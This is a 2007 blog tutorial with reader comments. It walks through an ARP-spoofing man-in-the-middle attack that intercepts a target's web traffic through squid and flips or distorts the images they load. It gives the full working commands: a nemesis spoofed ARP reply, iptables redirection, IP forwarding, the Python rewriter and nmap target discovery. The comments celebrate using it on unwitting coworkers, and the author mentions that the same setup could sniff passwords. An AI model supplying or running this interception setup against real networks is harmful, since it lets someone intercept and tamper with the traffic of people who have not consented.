This site is now 100% read-only, and retired.

XML logo

Fun with squid, imagemagick, and ARP spoofing
Posted by johns on Tue 18 Sep 2007 at 21:06
Tags: none.

The idea comes from http://www.ex-parrot.com/~pete/upside-down-ternet.html, which describes how to have fun with wireless freeloaders by flipping all images requested by their browser (there's a screenshot on the page).
In this article I'm going to describe how to do it in a different way - instead of modifying the gateway, I'm going to use ARP spoofing (also called ARP poisoning) to trick the target box into thinking that my box is the gateway.
(This article assumes that both the attacker and target are on the same private network.)

What are ARP and ARP spoofing anyway?
ARP, or Address Resolution Protocol, is used to translate IP addresses to Ethernet MAC addresses.
The kernel maintains an ARP cache that can be viewed by typing /usr/sbin/arp. When you try to access an IP address that isn't in the cache, an ARP request ("who has <IP>? tell <MAC>") is sent to broadcast. The target computer then sends back an ARP reply ("<IP> is at <MAC>").
ARP is a stateless protocol, so one can easily send a spoofed ARP reply at any time.

For better and more complete descriptions:
http://en.wikipedia.org/wiki/Address_Resolution_Protocol
http://en.wikipedia.org/wiki/ARP_spoofing

Let's start by installing some prerequisites.
If you already have a HTTP server installed, or if you don't want to use httpd, remove it from the command below.
# apt-get install squid nemesis imagemagick thttpd

Squid is a caching HTTP proxy that has the nice feature of letting one define a script to rewrite URLs. Nemesis will be used for sending fake ARP replies, imagemagick for transforming images, and thttpd for serving transformed images to the proxy server.

# nano /usr/local/bin/squidupsidedown

Copy and paste the following code:


#!/usr/bin/env python
import os, sys
import urllib, re, subprocess
outdir = '/var/www/squidupsidedown'
wwwpath = 'http://localhost/squidupsidedown';
img_regex = re.compile(r'(?i).(jpg|jpeg|png|gif)$')
operation = '-flip' # mogrify -help for more options
operation = operation.split()
count = 0
while True:
        l = raw_input().split(' ')
        url = l[0]
        m = img_regex.search(url)
        if m:
                outname = '%d-%d.%s' % (os.getpid(), count, m.group(1))
                outpath = os.path.join(outdir, outname)
                count += 1
                try:
                        urllib.urlretrieve(url, outpath)
                        os.chmod(outpath, 0644)
                        subprocess.call(['mogrify'] + operation + [outpath])
                        print '/'.join([wwwpath, outname])
                except (IOError, urllib.ContentTooShortError):
                        print url

        else:
                print url
        sys.stdout.flush()

Save the file.

# chmod +x /usr/local/bin/squidupsidedown
# mkdir /var/www/squidupsidedown
# chown proxy /var/www/squidupsidedown

squidupsidedown is a simple squid URL rewriter. Squid URL rewriters are expected to read a URL from stdin and write a (possibly changed) URL to stdout.
In this case, if the URL ends in .jpg/.png/.gif, it is assumed to be a image and is downloaded to /var/www/squidupsidedown and transformed using mogrify. The URL http://localhost/squidupsidedown/pid-count.ext is then passed to squid.
By default images are flipped, but any operation supported by mogrify (-help) can be used.

We have to make a few changes to squid.

# nano /etc/squid/squid.conf
Around line 73:

http_port 3128 transparent

This enables transparent proxying.

Around line 2577 (substitute 192.168.26.0/24 with your network):

acl our_networks src 192.168.26.0/24
http_access allow our_networks

Around line 1464:

url_rewrite_program /usr/local/bin/squidupsidedown

Restart squid.

# invoke-rc.d squid restart

Enable IP forwarding in the kernel. This is necessary so that our box will work as a gateway, also for non-HTTP traffic, for the target.

# echo 1 > /proc/sys/net/ipv4/ip_forward

Enable transparent proxying. Substitute eth0 with the appropriate network interface.

# iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 3128

With all the setup completed, it's time for the attack itself. Define the variables below, where my_macaddr is the MAC address of your (attacking) box, gw_ipaddr is the IP address of the gateway/router, target_macaddr is the MAC address of the target, and target_ipaddr is the IP address of the target.

my_macaddr=00:11:22:33:44:55:66
gw_ipaddr=192.168.26.1
target_macaddr=00:66:55:44:33:22:11
target_ipaddr=192.168.26.103

To get these you can:
* nmap the network, you have to be root to see MAC addresses:
# nmap 192.168.26.1-
* Or if you know the IP address of the target:
$ ping -c 1 192.168.26.103; /usr/sbin/arp

To get your own MAC address type /sbin/ifconfig.

Send a spoofed ARP reply. For more information on the arguments, type nemesis arp help. Again, substitute eth0 with the appropriate network interface.

# nemesis arp -S $gw_ipaddr -D $target_ipaddr -h $my_macaddr -m $target_macaddr -r -d eth0 -H $my_macaddr -M $target_macaddr

The target will update its ARP cache occasionally. The above command will have to be repeated when it does (you can put the command in a loop).
On the target, type /usr/sbin/arp (linux) or arp (windows). If it worked, you should see your own MAC address instead of the gateway MAC address.

When testing remember that the browser caches images. If it doesn't appear to work, visit another page or clear the cache.

Screenshot: http://gethome.no/~jskogtv/dillo_grml.png

(This is my first post on debian-administration, so a brief introduction: My name is John, I'm 19 and a Linux user since 2002. This site has been very useful to me on multiple occasions, and hopefully this will be useful or at least entertaining to someone. Comments are welcome.)

 

Comments on this Entry

Re: Fun with squid, imagemagick, and ARP spoofing
Posted by Anonymous (71.241.xx.xx) on Wed 19 Sep 2007 at 01:37
I Like !

[ Parent ]

Re: Fun with squid, imagemagick, and ARP spoofing
Posted by GhostR (217.237.xx.xx) on Wed 19 Sep 2007 at 07:39
[ View Weblogs ]
DUDE! Dont do this to me! I have to work! I got so much crap to do (guess it has to wait)! Ok, I ll screw with my coworkers a little while I eat breakfast! I never had the idea of flipping pictures! how coole is that!
Nice one!

[ Parent ]

Re: Fun with squid, imagemagick, and ARP spoofing
Posted by GhostR (217.237.xx.xx) on Wed 19 Sep 2007 at 08:59
[ View Weblogs ]
Ok this is freaking funny as hell! I got coworkers calling complaining about there monitors that pictures seem blury (-blury 4) or that imagages are getting flipped!
I m having a good time! I love my job! (Cant wait for my boss!)
Thanks for that fun howto again!

[ Parent ]

Re: Fun with squid, imagemagick, and ARP spoofing
Posted by johns (84.208.xx.xx) on Wed 19 Sep 2007 at 14:43
[ View Weblogs ]

I should add that part of the point of the post was pointing out the security implications. It is basically a man-in-the-middle attack, and instead of flipping images I could be sniffing passwords - e.g. a SSL connection without certificate verification. The wikipedia article on ARP spoofing suggests a few defenses.

[ Parent ]

Re: Fun with squid, imagemagick, and ARP spoofing
Posted by ajt (204.193.xx.xx) on Thu 27 Sep 2007 at 13:45
[ View Weblogs ]
While this is very funny, it's also serious.

I tend believe that that a lot of people get what they deserve but at the same time a man-in-the-middle-attack relying on your neighbours ignorance could still get you into trouble with the law...

I don't run a Wireless network at home, I use a proper switched network and cables. On one friends visit their notebook picked up five open networks covering the house, three of them with good strong signal strength.

--
"It's Not Magic, It's Work"
Adam

[ Parent ]

Re: Fun with squid, imagemagick, and ARP spoofing
Posted by Anonymous (80.69.xx.xx) on Fri 21 Sep 2007 at 09:34
nice idea! I will plug this to our squid next 1. april ;-]

thx
7horsten

[ Parent ]

Re: Fun with squid, imagemagick, and ARP spoofing
Posted by Anonymous (140.105.xx.xx) on Thu 2 Apr 2009 at 09:27
it's also useful to disable redirects

for f in /proc/sys/net/ipv4/conf/*/send_redirects; do echo 0 > $f; done;

[ Parent ]

Re: Fun with squid, imagemagick, and ARP spoofing
Posted by Anonymous (174.46.xx.xx) on Fri 30 Oct 2009 at 16:45
The idea is a great prank for Haloween :)
my "finishing touches":

operations = ['-posterize 5', '-polaroid 10', '-negate', '-implode 5', '-monochrome', '-flip', '-flop', '-transverse', '-swirl 90', '-transpose', '-blur 4'] # mogrify -help for more options

operation = random.choice(operations)
operation = operation.split()

[ Parent ]